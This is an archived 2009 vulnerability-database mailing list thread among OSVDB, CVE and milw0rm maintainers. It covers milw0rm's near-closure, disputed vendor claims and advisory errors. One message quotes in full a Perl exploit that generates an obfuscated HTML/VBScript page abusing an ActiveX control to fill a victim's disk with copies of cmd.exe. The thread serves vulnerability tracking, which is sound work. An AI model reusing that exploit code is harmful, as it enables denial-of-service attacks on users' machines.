From jericho at attrition.org Tue Jul 7 22:48:15 2009 From: jericho at attrition.org (security curmudgeon) Date: Tue, 7 Jul 2009 22:48:15 +0000 (UTC) Subject: [VIM] bye milw0rm?! Message-ID: http://www.milw0rm.com/ Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past. Be safe, /str0ke From coley at linus.mitre.org Tue Jul 7 22:57:51 2009 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 7 Jul 2009 18:57:51 -0400 (EDT) Subject: [VIM] bye milw0rm?! In-Reply-To: References: Message-ID: say it ain't so, str0ke! (but I'll still buy you a beer at Defcon) - Steve On Tue, 7 Jul 2009, security curmudgeon wrote: > > http://www.milw0rm.com/ > > Well, this is my goodbye header for milw0rm. I wish I had the time I did > in the past to post exploits, I just don't :(. For the past 3 months I > have actually done a pretty crappy job of getting peoples work out fast > enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to > the authors on this site. I appreciate and thank everyone for their > support in the past. > Be safe, /str0ke > From jericho at attrition.org Tue Jul 7 22:59:56 2009 From: jericho at attrition.org (security curmudgeon) Date: Tue, 7 Jul 2009 22:59:56 +0000 (UTC) Subject: [VIM] bye milw0rm?! In-Reply-To: References: Message-ID: : say it ain't so, str0ke! (but I'll still buy you a beer at Defcon) I'll buy you many, if you keep it going =) 72 hours? So what, exploit writers can learn to be patient. All of the behind the scenes work you did in helping to weed out fakes, watch for 'reprints' and generally perform QA that the writers didn't, was incredible. Much rather see you do it at your own pace, than the half dozen 'new milw0rm' sites that pop up and drop the quality. From dennis.groves at gmail.com Tue Jul 7 23:02:49 2009 From: dennis.groves at gmail.com (Dennis Groves) Date: Wed, 8 Jul 2009 00:02:49 +0100 Subject: [VIM] bye milw0rm?! In-Reply-To: References: Message-ID: <7054e2d40907071602w1f53d592t1975cf0c7d1756f7@mail.gmail.com> do you think you may want to let somebody else in the community take it over? 2009/7/7 security curmudgeon > > http://www.milw0rm.com/ > > Well, this is my goodbye header for milw0rm. I wish I had the time I did in > the past to post exploits, I just don't :(. For the past 3 months I have > actually done a pretty crappy job of getting peoples work out fast enough to > be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors > on this site. I appreciate and thank everyone for their support in the past. > Be safe, /str0ke > -- Dennis Groves // dennis.groves at gmail.com // +44 07878 390162 Life has its own way to push you in another direction and teaching you lessons the hard way. When looking back years later, you know everything happened for the best. ?That every event is the right one. Look closely and you?ll see. Not just the right one overall, but right. As if someone had weighed it out with scales.? ?Marcus Aurelius -------------- next part -------------- An HTML attachment was scrubbed... URL: http://www.attrition.org/pipermail/vim/attachments/20090707/e6171948/attachment.html From str0ke at milw0rm.com Thu Jul 9 14:17:11 2009 From: str0ke at milw0rm.com (str0ke) Date: Thu, 09 Jul 2009 09:17:11 -0500 Subject: [VIM] bye milw0rm?! In-Reply-To: References: Message-ID: <4A55FBE7.7080107@milw0rm.com> Hey guys ya sorry for the late one on this one, was out of town when deciding the fate of milw0rm and with all of the emails / twitters / phone calls / txt messages, I can't just let it die. The damn box wasn't supposed to go offline yesterday, I just couldn't login to restart the power after its os took a crap from the hits :( security curmudgeon wrote: > : say it ain't so, str0ke! (but I'll still buy you a beer at Defcon) > > I'll buy you many, if you keep it going =) > > 72 hours? So what, exploit writers can learn to be patient. All of the > behind the scenes work you did in helping to weed out fakes, watch for > 'reprints' and generally perform QA that the writers didn't, was > incredible. > > Much rather see you do it at your own pace, than the half dozen 'new > milw0rm' sites that pop up and drop the quality. > > > From str0ke at milw0rm.com Thu Jul 9 14:21:40 2009 From: str0ke at milw0rm.com (str0ke) Date: Thu, 09 Jul 2009 09:21:40 -0500 Subject: [VIM] bye milw0rm?! In-Reply-To: References: Message-ID: <4A55FCF4.7030201@milw0rm.com> I guess I'll take the many. Way to many people unhappy with me over the idea of closing shop. I just needed help which I have alot of people to choose from now. Damn box died yesterday from the hits and I didn't have a stable internet connection to login to reboot it :( /str0ke security curmudgeon wrote: > : say it ain't so, str0ke! (but I'll still buy you a beer at Defcon) > > I'll buy you many, if you keep it going =) > > 72 hours? So what, exploit writers can learn to be patient. All of the > behind the scenes work you did in helping to weed out fakes, watch for > 'reprints' and generally perform QA that the writers didn't, was > incredible. > > Much rather see you do it at your own pace, than the half dozen 'new > milw0rm' sites that pop up and drop the quality. > > > From jericho at attrition.org Thu Jul 9 19:32:09 2009 From: jericho at attrition.org (security curmudgeon) Date: Thu, 9 Jul 2009 19:32:09 +0000 (UTC) Subject: [VIM] bye milw0rm?! In-Reply-To: <4A55FCF4.7030201@milw0rm.com> References: <4A55FCF4.7030201@milw0rm.com> Message-ID: On Thu, 9 Jul 2009, str0ke wrote: : I guess I'll take the many. Way to many people unhappy with me over the : idea of closing shop. I just needed help which I have alot of people to : choose from now. Damn box died yesterday from the hits and I didn't : have a stable internet connection to login to reboot it :( Just make it clear. You get submissions, you handle them as you can, on your schedule. =) From webapp at web-app.org Thu Jul 9 20:18:52 2009 From: webapp at web-app.org (WebAPP) Date: Thu, 9 Jul 2009 13:18:52 -0700 Subject: [VIM] bye milw0rm?! References: <4A55FCF4.7030201@milw0rm.com> Message-ID: <3B990580F1644523B6F4C8B6C334BEF5@mjbrown01> That's a great idea and how I have been doing it for the past couple years at my Web Directory. There are just too many to keep up with on a steady basis. 10,000 pending? Haha I don't think so but I try to keep up where I can. Anyways I'm glad to hear you are staying with the site str0ke. It's a great resource as well as you being an important contributor to the security community and the Web Development world in general. Thanks for all you have done. Jos Brown ----- Original Message ----- From: "security curmudgeon" To: "Vulnerability Information Managers" Sent: Thursday, July 09, 2009 12:32 PM Subject: Re: [VIM] bye milw0rm?! > > On Thu, 9 Jul 2009, str0ke wrote: > > : I guess I'll take the many. Way to many people unhappy with me over the > : idea of closing shop. I just needed help which I have alot of people to > : choose from now. Damn box died yesterday from the hits and I didn't > : have a stable internet connection to login to reboot it :( > > Just make it clear. You get submissions, you handle them as you can, on > your schedule. =) > From dennis.groves at gmail.com Thu Jul 9 21:44:20 2009 From: dennis.groves at gmail.com (Dennis Groves) Date: Thu, 9 Jul 2009 22:44:20 +0100 Subject: [VIM] bye milw0rm?! In-Reply-To: <3B990580F1644523B6F4C8B6C334BEF5@mjbrown01> References: <4A55FCF4.7030201@milw0rm.com> <3B990580F1644523B6F4C8B6C334BEF5@mjbrown01> Message-ID: <7054e2d40907091444t510bbe70vbb57de5a78896ddd@mail.gmail.com> str0ke, I am glad to see the resource remain - it is really a very generous and important contribution to the field of security. Thank you. Perhaps you could automate the task, and/or open up the site to volunteers (you trust) to validate and approve issues for the site to help with the backlog and allow you to step away when it gets overwhelming? Cheers, Dennis Dennis Groves // dennis.groves at gmail.com // +44 07878 390162 Life has its own way to push you in another direction and teaching you lessons the hard way. When looking back years later, you know everything happened for the best. ?That every event is the right one. Look closely and you?ll see. Not just the right one overall, but right. As if someone had weighed it out with scales.? ?Marcus Aurelius On Thu, Jul 9, 2009 at 9:18 PM, WebAPP wrote: > That's a great idea and how I have been doing it for the past couple years > at my Web Directory. There are just too many to keep up with on a steady > basis. 10,000 pending? Haha I don't think so but I try to keep up where I > can. > > Anyways I'm glad to hear you are staying with the site str0ke. It's a great > resource as well as you being an important contributor to the security > community and the Web Development world in general. > > Thanks for all you have done. > > Jos Brown > > ----- Original Message ----- From: "security curmudgeon" > > To: "Vulnerability Information Managers" > Sent: Thursday, July 09, 2009 12:32 PM > Subject: Re: [VIM] bye milw0rm?! > > >> >> On Thu, 9 Jul 2009, str0ke wrote: >> >> : I guess I'll take the many. ?Way to many people unhappy with me over the >> : idea of closing shop. ?I just needed help which I have alot of people to >> : choose from now. ?Damn box died yesterday from the hits and I didn't >> : have a stable internet connection to login to reboot it :( >> >> Just make it clear. You get submissions, you handle them as you can, on >> your schedule. =) >> > > From coley at linus.mitre.org Thu Jul 9 22:12:11 2009 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 9 Jul 2009 18:12:11 -0400 (EDT) Subject: [VIM] bye milw0rm?! In-Reply-To: <7054e2d40907091444t510bbe70vbb57de5a78896ddd@mail.gmail.com> References: <4A55FCF4.7030201@milw0rm.com> <3B990580F1644523B6F4C8B6C334BEF5@mjbrown01> <7054e2d40907091444t510bbe70vbb57de5a78896ddd@mail.gmail.com> Message-ID: str0ke, Glad to hear that milw0rm will continue in one form or another! It's become an extremely valuable resource for publication of new issues for everybody, including CVE. And we all benefit from all the work you do behind the scenes to ensure that the information you let through doesn't suck. milw0rm references are in about 35% of the 8700+ CVE's we've published since January 2008, and it was the *only* source of raw vulnerability information in about 20% to 30% of published CVEs in that time frame (this number includes working exploits). i.e., there was a ton of stuff on your site that wasn't on any other site (or list) that we regularly monitored. No doubt that the presence of milw0rm contributed significantly to the CVE trends that show the rise of web application vulnerabilities. Whether you're quoting folk singer Joni Mitchell or 80's metal rockers, the phrase "don't know what you got till it's gone" comes to mind. Thank you, Steve From str0ke at milw0rm.com Thu Jul 9 23:27:04 2009 From: str0ke at milw0rm.com (str0ke) Date: Thu, 09 Jul 2009 18:27:04 -0500 Subject: [VIM] EZNewsletter V3 Arbitrary Database Disclosure Vulnerability Message-ID: <4A567CC8.8080601@milw0rm.com> I received this in the past and it shouldn't be counted as a vuln. readme.txt ***************************************************** * WARNING #SECURITY NOTICE# WARNING * * * * I STRONGLY urge you to either rename the * * database or put the database in a folder * * outside your root folder. * * * * If you dont, you run the risk of someone * * accessing your database and getting your * * login info. * * This is true for all MS Access databases * * * ***************************************************** From ryan at thievco.com Tue Jul 14 01:10:38 2009 From: ryan at thievco.com (Ryan Russell) Date: Mon, 13 Jul 2009 18:10:38 -0700 Subject: [VIM] [Fwd: FileRun vulns] Message-ID: <4A5BDB0E.9040305@thievco.com> Am told this is a multi-maintainer vuln info list. Apologies in advance if I'm mailing the wrong folks. Ryan -------- Original Message -------- Subject: FileRun vulns Date: Mon, 13 Jul 2009 16:54:55 -0700 From: Ryan Russell To: OSVDB Manglers I have a "vendor response" from FileRun: "Those vulnerabilities were published in February 2007 by "pridels0.blogspot.com" and taken over by "http://secunia.com/". Since then, this information was copied by all kind of websites with information on software vulnerabilities. Anyway, they were affecting the public demo that was on display and were fixed in the first FileRun major version (1.0). Feel free to get back to us at any time. Best regards, FileRun Support Team http://www.filerun.com" Covering these: http://osvdb.org/search?search[vuln_title]=filerun&search[text_type]=titles I can't even see what the original vuln claim is. I have a copy running, I happen to be trying to use it for the day job. What would the procedure be? Ryan From steve at vitriol.net Tue Jul 14 13:58:39 2009 From: steve at vitriol.net (Steve Tornio) Date: Tue, 14 Jul 2009 08:58:39 -0500 Subject: [VIM] [OSVDB Mods] FileRun vulns In-Reply-To: <4A5BD066.50605@thievco.com> References: <4A5BD066.50605@thievco.com> Message-ID: On Mon, Jul 13, 2009 at 7:25 PM, Ryan Russell wrote: > I have a "vendor response" from FileRun: > "Those vulnerabilities were published in February 2007 by > "pridels0.blogspot.com" and taken over by "http://secunia.com/". Since > then, this information was copied by all kind of websites with > information on software vulnerabilities. Anyway, they were affecting the > public demo that was on display and were fixed in the first FileRun > major version (1.0). > It looks like the Secunia (and the rest of us) borked the link. The original report can be viewed at http://pridels0.blogspot.com/2007/05/filerun-vuln.html r0t claims that 1.0 and earlier are affected, so that seems to be at odds with the vendor response. Are you able to verify whether 1.0 is vulnerable? Covering these: > http://osvdb.org/search?search[vuln_title]=filerun&search[text_type]=titles I'm going to update our entries with the new advisory URL. If you come up with any additional info, feel free to forward it on, or mangle it up and we'll push out the update. Thanks, Steve osvdb.org -------------- next part -------------- An HTML attachment was scrubbed... URL: http://www.attrition.org/pipermail/vim/attachments/20090714/9af0cd73/attachment.html From coley at linus.mitre.org Tue Jul 14 18:26:46 2009 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 14 Jul 2009 14:26:46 -0400 (EDT) Subject: [VIM] [OSVDB Mods] FileRun vulns In-Reply-To: References: <4A5BD066.50605@thievco.com> Message-ID: On Tue, 14 Jul 2009, Steve Tornio wrote: > r0t claims that 1.0 and earlier are affected, so that seems to be at odds > with the vendor response. Are you able to verify whether 1.0 is vulnerable? r0t would only test the most obvious software downloads and/or the online demos, so I'd take his claims of affected versions with a large grain of salt. (Steve, note that your posts are also going to the public VIM list) Thanks for forwarding this, Ryan. - Steve > Covering these: > > http://osvdb.org/search?search[vuln_title]=filerun&search[text_type]=titles > > > > I'm going to update our entries with the new advisory URL. If you come up > with any additional info, feel free to forward it on, or mangle it up and > we'll push out the update. > > Thanks, > Steve > osvdb.org > From cji at attrition.org Tue Jul 14 18:44:14 2009 From: cji at attrition.org (cji) Date: Tue, 14 Jul 2009 18:44:14 +0000 (UTC) Subject: [VIM] MS09-032 and Office Web Component ActiveX Message-ID: MS09-032 is listed as addressing CVE-2008-0015. http://www.microsoft.com/technet/security/Bulletin/MS09-032.mspx However, the KB article for the Office Web Components issue lists MS09-032 as addressing that issue as well. Copy/paste error, or does it include the kill bit for that? http://support.microsoft.com/kb/973472 (Note the technet advisory for the OWC issue still says use the workaround - but then links to the KB article saying MS09-032 addresses it - http://www.microsoft.com/technet/security/advisory/973472.mspx). Thank you, Craig From steve at vitriol.net Tue Jul 14 18:54:38 2009 From: steve at vitriol.net (Steve Tornio) Date: Tue, 14 Jul 2009 13:54:38 -0500 Subject: [VIM] [OSVDB Mods] FileRun vulns In-Reply-To: References: <4A5BD066.50605@thievco.com> Message-ID: On Tue, Jul 14, 2009 at 1:26 PM, Steven M. Christey wrote: > > > > (Steve, note that your posts are also going to the public VIM list) > Did I post something non-public? I figured to save time by replying to his emails to both lists at once. I forgot about r0t's track record. The benefit of picking and choose which entries I work on :) Steve -------------- next part -------------- An HTML attachment was scrubbed... URL: http://www.attrition.org/pipermail/vim/attachments/20090714/89488139/attachment.html From coley at linus.mitre.org Tue Jul 14 18:57:59 2009 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 14 Jul 2009 14:57:59 -0400 (EDT) Subject: [VIM] [OSVDB Mods] FileRun vulns In-Reply-To: References: <4A5BD066.50605@thievco.com> Message-ID: On Tue, 14 Jul 2009, Steve Tornio wrote: > Did I post something non-public? I figured to save time by replying to his > emails to both lists at once. no, your reply was very osvdb-centric (perish the thought) so it smelled like an internal message to me. > I forgot about r0t's track record. The benefit of picking and choose > which entries I work on :) Indeed. Some of us aren't always so lucky :) - Steve From ryan at thievco.com Tue Jul 14 19:01:37 2009 From: ryan at thievco.com (Ryan Russell) Date: Tue, 14 Jul 2009 12:01:37 -0700 Subject: [VIM] [OSVDB Mods] FileRun vulns In-Reply-To: References: <4A5BD066.50605@thievco.com> Message-ID: <4A5CD611.1000408@thievco.com> Ah, now I can see the original claim. Will test current version tomorrow. I will also see what I can do about historical versions. Ryan Steven M. Christey wrote: > On Tue, 14 Jul 2009, Steve Tornio wrote: > >> r0t claims that 1.0 and earlier are affected, so that seems to be at odds >> with the vendor response. Are you able to verify whether 1.0 is vulnerable? > > r0t would only test the most obvious software downloads and/or the online > demos, so I'd take his claims of affected versions with a large grain of > salt. > > (Steve, note that your posts are also going to the public VIM list) > > Thanks for forwarding this, Ryan. > > - Steve > > >> Covering these: >>> http://osvdb.org/search?search[vuln_title]=filerun&search[text_type]=titles >> >> >> I'm going to update our entries with the new advisory URL. If you come up >> with any additional info, feel free to forward it on, or mangle it up and >> we'll push out the update. >> >> Thanks, >> Steve >> osvdb.org >> > From steve at vitriol.net Tue Jul 14 19:14:24 2009 From: steve at vitriol.net (Steve Tornio) Date: Tue, 14 Jul 2009 14:14:24 -0500 Subject: [VIM] [OSVDB Mods] FileRun vulns In-Reply-To: References: <4A5BD066.50605@thievco.com> Message-ID: On Tue, Jul 14, 2009 at 1:57 PM, Steven M. Christey wrote: > > > no, your reply was very osvdb-centric (perish the thought) so it smelled > like an internal message to me. > Gotcha. I actually intended for the other VDBs to see that they had the advisory link wrong, too. It looked like only CVE had the correct URL. Steve -------------- next part -------------- An HTML attachment was scrubbed... URL: http://www.attrition.org/pipermail/vim/attachments/20090714/c84f4b7e/attachment.html From theall at tenablesecurity.com Tue Jul 14 21:19:59 2009 From: theall at tenablesecurity.com (George A. Theall) Date: Tue, 14 Jul 2009 17:19:59 -0400 Subject: [VIM] MS09-032 and Office Web Component ActiveX In-Reply-To: References: Message-ID: On Jul 14, 2009, at 2:44 PM, cji wrote: > However, the KB article for the Office Web Components issue lists > MS09-032 as addressing that issue as well. Copy/paste error, or does > it include the kill bit for that? > http://support.microsoft.com/kb/973472 > > (Note the technet advisory for the OWC issue still says use the > workaround - but then links to the KB article saying MS09-032 > addresses it - http://www.microsoft.com/technet/security/advisory/973472.mspx) > . I'm not seeing any reference to MS09-032 in the OWC KB article, which still appears to be at v1.0 from 7/13. George -- theall at tenablesecurity.com From cji at attrition.org Tue Jul 14 22:07:32 2009 From: cji at attrition.org (cji) Date: Tue, 14 Jul 2009 22:07:32 +0000 (UTC) Subject: [VIM] MS09-032 and Office Web Component ActiveX In-Reply-To: References:

Message-ID: Damn, should have taken a screenshot so no one thinks I'm crazy, but they appear to have fixed it and it's showing the workaround still. Thank you, Craig On Tue, 14 Jul 2009, George A. Theall wrote: > On Jul 14, 2009, at 2:44 PM, cji wrote: > >> However, the KB article for the Office Web Components issue lists MS09-032 >> as addressing that issue as well. Copy/paste error, or does it include the >> kill bit for that? >> http://support.microsoft.com/kb/973472 >> >> (Note the technet advisory for the OWC issue still says use the workaround >> - but then links to the KB article saying MS09-032 addresses it - >> http://www.microsoft.com/technet/security/advisory/973472.mspx). > > I'm not seeing any reference to MS09-032 in the OWC KB article, which still > appears to be at v1.0 from 7/13. > > George > -- > theall at tenablesecurity.com > > From str0ke at milw0rm.com Fri Jul 17 15:27:47 2009 From: str0ke at milw0rm.com (str0ke) Date: Fri, 17 Jul 2009 10:27:47 -0500 Subject: [VIM] [Fwd: COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit)] Message-ID: <4A609873.6040609@milw0rm.com> Tested this remotely and it didn't work. Target.CreateFolder wasn't allowed. /str0ke #!/usr/bin/perl ############################################################### # COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit) # # Discovered and Exploited by : Khashayar Fereidani # Http://IRCRASH.com & Http://Fereidani.ir # ############################################################### # Help : # perl comraider.pl # Please enter the foldername (C:\ircrash\ for example) : C:\ircrash\ # Please enter number of copy cmd to folder (10000 or more for example) : 10000 # ** Ok comraider.html created , now you can use this ############################################################### # Tnx : Only for God ############################################################### $cmd = 'C:\WINDOWS\system32\cmd.exe'; print 'Please enter the foldername (C:\ircrash\ for example) : '; $folder = ; print "Please enter number of copy cmd to folder (10000 or more for example) : "; $number = ; chomp $number; chomp $folder; $shellcode = chr(0x3C).chr(0x48).chr(0x54).chr(0x4D).chr(0x4C).chr(0x3E).chr(0xD).chr(0xA).chr(0x3C).chr(0x21).chr(0x2D).chr(0x2D).chr(0xD).chr(0xA).chr(0x43).chr(0x4F).chr(0x4D).chr(0x52).chr(0x61).chr(0x69).chr(0x64).chr(0x65).chr(0x72).chr(0x20).chr(0x49).chr(0x64).chr(0x65).chr(0x66).chr(0x65).chr(0x6E).chr(0x73).chr(0x65).chr(0x20).chr(0x4C).chr(0x61).chr(0x62).chr(0x73).chr(0x20).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x28).chr(0x29).chr(0x20).chr(0x61).chr(0x6E).chr(0x64).chr(0x20).chr(0x43).chr(0x6F).chr(0x70).chr(0x79).chr(0x28).chr(0x29).chr(0x20).chr(0x49).chr(0x6E).chr(0x73).chr(0x65).chr(0x63).chr(0x75).chr(0x72).chr(0x65).chr(0x20).chr(0x4D).chr(0x65).chr(0x74).chr(0x68).chr(0x6F).chr(0x64).chr(0x20).chr(0x45).chr(0x78).chr(0x70).chr(0x6C).chr(0x6F).chr(0x69).chr(0x74).chr(0xD).chr(0xA).chr(0x44).chr(0x69).chr(0x73).chr(0x63).chr(0x6F).chr(0x76).chr(0x65).chr(0x72).chr(0x65).chr(0x64).chr(0x20).chr(0x62).chr(0x79).chr(0x20).chr(0x3A).chr(0x20).chr(0x4B).chr(0x68).chr(0x61).chr(0x73).chr(0x68).chr(0x61).chr(0x79).chr(0x61).chr(0x72).chr(0x20).chr(0x46).chr(0x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0xD).chr(0xA).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x66).chr(0x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0x2E).chr(0x69).chr(0x72).chr(0x20).chr(0x26).chr(0x20).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x69).chr(0x72).chr(0x63).chr(0x72).chr(0x61).chr(0x73).chr(0x68).chr(0x2E).chr(0x63).chr(0x6F).chr(0x6D).chr(0xD).chr(0xA).chr(0x2D).chr(0x2D).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x20).chr(0x63).chr(0x6C).chr(0x61).chr(0x73).chr(0x73).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x63).chr(0x6C).chr(0x73).chr(0x69).chr(0x64).chr(0x3A).chr(0x39).chr(0x41).chr(0x30).chr(0x37).chr(0x37).chr(0x44).chr(0x30).chr(0x44).chr(0x2D).chr(0x42).chr(0x34).chr(0x41).chr(0x36).chr(0x2D).chr(0x34).chr(0x45).chr(0x43).chr(0x30).chr(0x2D).chr(0x42).chr(0x36).chr(0x43).chr(0x46).chr(0x2D).chr(0x39).chr(0x38).chr(0x35).chr(0x32).chr(0x36).chr(0x44).chr(0x46).chr(0x35).chr(0x38).chr(0x39).chr(0x45).chr(0x34).chr(0x27).chr(0x20).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x27).chr(0x3E).chr(0x3C).chr(0x2F).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x20).chr(0x6C).chr(0x61).chr(0x6E).chr(0x67).chr(0x75).chr(0x61).chr(0x67).chr(0x65).chr(0x3D).chr(0x27).chr(0x76).chr(0x62).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x27).chr(0x3E).chr(0xD).chr(0xA).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0x3D).chr(0x22).$folder.chr(0x22).chr(0xD).chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x2E).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x20).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x30).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x20).chr(0x3D).chr(0x20).$number.chr(0xD).chr(0xA).chr(0x77).chr(0x68).chr(0x69).chr(0x6C).chr(0x65).chr(0x20).chr(0x28).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3C).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x29).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x2B).chr(0x20).chr(0x31).chr(0xD).chr(0xA).chr(0x61).chr(0x72).chr(0x67).chr(0x31).chr(0x3D).chr(0x22).$cmd.chr(0x22).chr(0xD).chr(0xA).chr(0x61).chr(0x72).chr(0x67).chr(0x32).chr(0x3D).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0x20).chr(0x26).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x26).chr(0x20).chr(0x22).chr(0x2E).chr(0x65).chr(0x78).chr(0x65).chr(0x22).chr(0xD).chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x2E).chr(0x43).chr(0x6F).chr(0x70).chr(0x79).chr(0x20).chr(0x61).chr(0x72).chr(0x67).chr(0x31).chr(0x20).chr(0x2C).chr(0x61).chr(0x72).chr(0x67).chr(0x32).chr(0xD).chr(0xA).chr(0x77).chr(0x65).chr(0x6E).chr(0x64).chr(0xD).chr(0xA).chr(0x3C).chr(0x2F).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x3E); print "** OK comraider.html created , now you can use this"; open(myfile,'>>comraider.html'); print myfile $shellcode; From str0ke at milw0rm.com Fri Jul 17 18:38:28 2009 From: str0ke at milw0rm.com (str0ke) Date: Fri, 17 Jul 2009 13:38:28 -0500 Subject: [VIM] MIL [9175] - Sguil/PADS Message-ID: <4A60C524.6050408@milw0rm.com> The sql injection is false and has been moved to just a denial of service vulnerability. /str0ke From jericho at attrition.org Mon Jul 20 07:27:21 2009 From: jericho at attrition.org (security curmudgeon) Date: Mon, 20 Jul 2009 07:27:21 +0000 (UTC) Subject: [VIM] PHP-Revista 1.1.2 (RFI/SQLi/CB/XSS) Multiple Remote Vulnerabilities In-Reply-To: <40A5D9B5-A647-4B5E-B2C9-35CDEE0BFEC2@tenablesecurity.com> References: <40A5D9B5-A647-4B5E-B2C9-35CDEE0BFEC2@tenablesecurity.com> Message-ID: On Wed, 15 Apr 2009, George A. Theall wrote: : Hey str0ke, you're aware that milw0rm 8425 is rather old, aren't you? : It's a repost of a message Sirdarckcat posted to Bugtraq in 2006 -- : http://www.securityfocus.com/archive/1/445007/30/0/threaded. : : I'm not sure why, but SecurityFocus created BID 34505 for the repost : even though BID 19818 is for the issues in the original post. I'm way behind on mail =) Which means.. Secunia noticed the same thing you did George. Which means that when I saw the mail in my inbox, it was 'outstanding' for OSVDB. I started going through and figuring which OSVDB refs from 2006 needed the new mail list post added, and ended up with 100% as previously disclosed. Jerk wasted 5 minutes of my time, so I replied to him/bugtraq. Doubt Bugtraq will approve though =) --- From: security curmudgeon To: marianiscc at hotmail.com Cc: bugtraq at securityfocus.com Date: Mon, 20 Jul 2009 07:02:25 +0000 (UTC) Subject: Re: PHP-Revista Multiple vulnerabilities On Mon, 13 Apr 2009, marianiscc at hotmail.com wrote: : Discovered by Sirdarckcat from elhacker.net By 'discovered', you mean 'copied from the disclosure in September 2006' right? CVE-2006-4605 through CVE-2006-4608. From jericho at attrition.org Mon Jul 27 01:04:49 2009 From: jericho at attrition.org (security curmudgeon) Date: Mon, 27 Jul 2009 01:04:49 +0000 (UTC) Subject: [VIM] where did MS KB 953602 go? Message-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-1216 As referenced there, ISS and other places. Linking to it results in 'no KB found', and searching MS for that number gives nothing. From jericho at attrition.org Mon Jul 27 08:33:01 2009 From: jericho at attrition.org (security curmudgeon) Date: Mon, 27 Jul 2009 08:33:01 +0000 (UTC) Subject: [VIM] HP / OfO vulnerability question Message-ID: Hello HP, http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00727143 This references CVE-2008-1666, which is not reference in the cpujul2008 Oracle update. Would you please clarify if this CVE identifier covers a vulnerability specific to OfO, or if this bulletin only covers vulnerabilities in the cpujul2008 advisory? Thank you, Brian OSVDB.org From coley at linus.mitre.org Mon Jul 27 14:21:47 2009 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 27 Jul 2009 10:21:47 -0400 (EDT) Subject: [VIM] annual VIM gathering at Black Hat / Defcon Message-ID: Well? Should we have another gathering? Fridays seem to work well because we may have stragglers from Black Hat and people coming in for Defcon. I assume that Quark's is gone. Last year we went to some restaurant near Quark's that provided adequate food/drink although the layout wasn't the best. On the other hand, it was right next to the Riviera. Anybody have other suggestions? - Steve From john.morris at hp.com Mon Jul 27 12:56:07 2009 From: john.morris at hp.com (Morris, John R. (SSRT)) Date: Mon, 27 Jul 2009 12:56:07 +0000 Subject: [VIM] HP / OfO vulnerability question In-Reply-To: References: Message-ID: <16F53A6138D7A84D93C3CF09D7291CF056B94A1B4C@GVW0442EXB.americas.hpqcorp.net> Hello Brian, Oracle for Openview (OfO) is Oracle. The only special characteristic of OfO is that HP provided it in a package with Openview. We issued a Security Bulletin for OfO because there may have been customers who did not have support contracts with Oracle and could only get updates from HP. The purpose of the Security Bulletin was to inform customers how to get the Oracle Critical Patch Updates. We no longer update the Security Bulletin. HPSBMA02133 SSRT061201 rev.9 says: ============== RESOLUTION Note: This will be the last revision of this Security Bulletin. 